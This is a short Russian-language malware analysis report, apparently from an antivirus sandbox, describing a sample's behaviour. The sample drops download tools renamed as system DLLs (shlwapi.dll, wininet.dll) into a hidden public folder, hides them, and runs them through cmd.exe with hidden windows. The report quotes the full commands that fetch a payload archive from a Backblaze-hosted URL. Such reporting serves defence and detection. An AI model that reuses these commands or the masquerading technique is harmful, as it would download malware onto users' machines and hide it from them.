Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- 'C:\users\public\documents\temp39180\shlwapi.dll' -k -s -L -o "C:\Users\Public\Documents\Temp39180\tmp352.zip" https://facaia.s3.us-east-005.backblazeb2.com/ice.zip
- 'C:\users\public\documents\temp39180\wininet.dll' /transfer t /download /priority normal https://facaia.s3.us-east-005.backblazeb2.com/ice.zip "C:\Users\Public\Documents\Temp39180\tmp352.zip"
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\documents\temp39180\shlwapi.dll
- C:\users\public\documents\temp39180\wininet.dll
Присваивает атрибут 'скрытый' для следующих файлов
- C:\users\public\documents\temp39180\shlwapi.dll
- C:\users\public\documents\temp39180\wininet.dll
Сетевая активность
UDP
- DNS ASK fa####.##.#s-east-005.backblazeb2.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\Documents\Temp39180\shlwapi.dll -k -s -L -o "C:\Users\Public\Documents\Temp39180\tmp352.zip" https://facaia.s3.us-east-005.backblazeb2.com/ice.zip (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\Documents\Temp39180\wininet.dll /transfer t /download /priority normal https://facaia.s3.us-east-005.backblazeb2.com/ice.zip "C:\Users\Public\Documents\Temp39180\tmp352.zip" (со скрытым окном)
